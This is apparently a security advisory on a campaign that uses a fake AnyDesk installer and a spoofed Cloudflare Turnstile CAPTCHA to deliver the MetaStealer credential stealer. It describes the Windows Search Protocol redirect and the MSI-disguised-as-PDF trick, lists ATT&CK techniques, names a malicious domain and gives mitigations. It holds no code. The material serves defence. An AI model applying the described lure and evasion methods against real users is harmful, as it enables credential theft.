This threat involves a sophisticated social engineering malware campaign that leverages a fake AnyDesk installer to deploy MetaStealer, a commodity information stealer malware. The attack chain is notable for mimicking tactics used by the ClickFix malware family but introduces novel techniques to evade detection and increase user deception. The infection begins with a lure that impersonates Cloudflare's Turnstile CAPTCHA service, tricking victims into interacting with a malicious webpage. Instead of the traditional ClickFix method of redirecting users to the Windows Run dialog, this variant redirects victims to Windows File Explorer via the Windows Search Protocol, which is an unusual and stealthy approach to execute the payload. The payload itself is an MSI package disguised as a PDF file, further increasing the likelihood of user execution due to the familiar file extension. Once executed, the malware collects the victim's hostname to tailor its actions and then drops MetaStealer. MetaStealer is known for harvesting sensitive credentials, stealing files, and potentially enabling further compromise through credential reuse or lateral movement. The attack utilizes multiple MITRE ATT&CK techniques such as T1113 (screen capture), T1056.001 (input capture: keylogging), T1074.001 (data staged), T1114.001 (email collection), T1005 (data from local system), T1140 (deobfuscate/decode files or information), T1555 (credentials from password stores), T1036 (masquerading), T1055 (process injection), T1087 (account discovery), T1083 (file and directory discovery), T1102 (web service), T1204 (user execution), T1547.001 (boot or logon autostart execution), T1566 (phishing), T1027 (obfuscated files or information), T1012 (query registry), T1059.003 (command and scripting interpreter: Windows Command Shell), and T1070.004 (indicator removal on host: file deletion). Indicators of compromise include hashes of the malicious MSI files, IP addresses, and domains used for hosting the fake installer and command and control. This attack highlights the evolving sophistication of social engineering campaigns and the importance of updated detection and user awareness strategies.

For European organizations, this threat poses a significant risk to confidentiality and integrity of sensitive data. MetaStealer’s capability to harvest credentials can lead to unauthorized access to corporate networks, email accounts, and cloud services, potentially resulting in data breaches, intellectual property theft, and financial fraud. The use of a fake AnyDesk installer is particularly dangerous as AnyDesk is widely used for remote support and administration, so users may be more inclined to trust and execute the fake installer. The attack’s stealthy execution method via Windows File Explorer and MSI disguised as PDFs increases the likelihood of successful infection. Organizations with remote workforces or those relying heavily on remote desktop tools are especially vulnerable. Additionally, the malware’s ability to collect system information and perform persistence mechanisms can facilitate prolonged undetected access, increasing the risk of lateral movement and further compromise. The medium severity rating reflects the moderate difficulty of exploitation (requiring user interaction) but significant potential damage if successful. The threat also underscores the need for vigilance against phishing and social engineering, which remain primary vectors for initial compromise in Europe’s diverse and highly regulated cybersecurity environment.

1. Implement strict email and web filtering to block access to known malicious domains and URLs associated with this campaign (e.g., anydeesk.ink and related domains). 2. Deploy endpoint detection and response (EDR) solutions capable of detecting suspicious MSI execution, masquerading, and process injection behaviors. 3. Enforce application whitelisting policies to prevent execution of unauthorized MSI packages and executables, especially those masquerading as PDFs. 4. Educate users about the risks of downloading and executing software from unofficial sources, emphasizing the dangers of fake remote desktop tools and social engineering lures mimicking legitimate services like Cloudflare Turnstile. 5. Monitor for unusual use of Windows Search Protocol and unexpected redirections to Windows File Explorer, which may indicate exploitation attempts. 6. Regularly audit and restrict the use of administrative privileges and credential storage to limit the impact of credential theft. 7. Use multi-factor authentication (MFA) across all critical systems to mitigate the risk of compromised credentials being abused. 8. Maintain up-to-date threat intelligence feeds and integrate IoCs such as hashes, IPs, and domains into security monitoring tools for early detection. 9. Conduct phishing simulation exercises tailored to the latest social engineering tactics to improve user resilience. 10. Review and harden system configurations to limit MSI package execution and disable unnecessary scripting capabilities where feasible.